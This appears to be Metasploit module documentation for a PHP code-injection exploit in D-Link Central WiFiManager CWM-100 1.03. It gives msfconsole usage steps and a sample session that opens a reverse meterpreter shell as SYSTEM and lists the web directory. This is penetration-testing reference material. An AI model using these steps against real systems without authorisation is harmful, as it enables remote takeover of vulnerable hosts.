## Vulnerable Application

### Introduction

This module exploits a PHP code injection vulnerability in D-Link Central WiFiManager CWM‑100.
The vulnerability exists because a user-controlled cookie is passed to the `eval()` function without being
sanitized.

Because the HTTP server runs in the context of a privileged user (with a default installation),
successful exploitation results in code execution as nt_authority\system.

A vulnerable version is available at DLink's vulnerability announcement:
- [The announcement](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10117)
- [ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip](ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip)

## Verification Steps

1. Start `msfconsole`
2. Do: `use windows/http/dlink_central_wifimanager_rce`
3. Do: `set RHOSTS [RHOSTS]`
4. Check the payload options: `show options`
5. Do: `exploit`
6. Verify that you get a shell / meterpreter / that whatever payload you used was executed

## Options

No additional options

## Scenarios

### CWM-100 v1.03

#### Getting a meterpreter session

```
msf5 exploit(windows/http/dlink_central_wifimanager_rce) > 
msf5 exploit(windows/http/dlink_central_wifimanager_rce) > exploit 

[*] Started reverse TCP handler on 192.168.1.222:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (38288 bytes) to 192.168.1.223
[*] Meterpreter session 1 opened (192.168.1.222:4444 -> 192.168.1.223:1783) at 2020-08-13 14:51:09 +0200

meterpreter > sysinfo
Computer    : REVM-PC
OS          : Windows NT REVM-PC 6.1 build 7601 (Windows 7 Professional N Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter > getuid 
Server username: SYSTEM (0)
meterpreter > pwd
C:\Program Files (x86)\D-Link\Central WifiManager\web
meterpreter > ls
Listing: C:\Program Files (x86)\D-Link\Central WifiManager\web
==============================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  177     fil   2014-09-16 16:19:18 +0200  .htaccess
100666/rw-rw-rw-  138884  fil   2016-01-28 13:36:32 +0100  AP_Installation_utility_for_cwm.zip
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:25 +0200  CapLoginStyle
40777/rwxrwxrwx   0       dir   2020-08-13 12:50:25 +0200  Common
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:45 +0200  Conf
40777/rwxrwxrwx   0       dir   2020-08-13 12:50:25 +0200  DBBackup
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:44 +0200  Lang
40777/rwxrwxrwx   0       dir   2020-08-13 12:50:26 +0200  Lib
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:45 +0200  Public
100666/rw-rw-rw-  256     fil   2014-09-16 16:19:18 +0200  README.txt
40777/rwxrwxrwx   0       dir   2020-08-13 13:02:13 +0200  Runtime
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:27 +0200  ThinkPHP
40777/rwxrwxrwx   0       dir   2020-08-13 12:50:26 +0200  Tpl
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:38 +0200  captivalportal
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:36 +0200  ckeditor
100666/rw-rw-rw-  15086   fil   2014-09-16 16:19:18 +0200  favicon.ico
100666/rw-rw-rw-  158     fil   2014-09-16 16:19:18 +0200  index.php
100666/rw-rw-rw-  122     fil   2015-10-29 14:17:48 +0100  redrect.php
100666/rw-rw-rw-  211     fil   2014-09-16 16:19:18 +0200  robots.txt
```
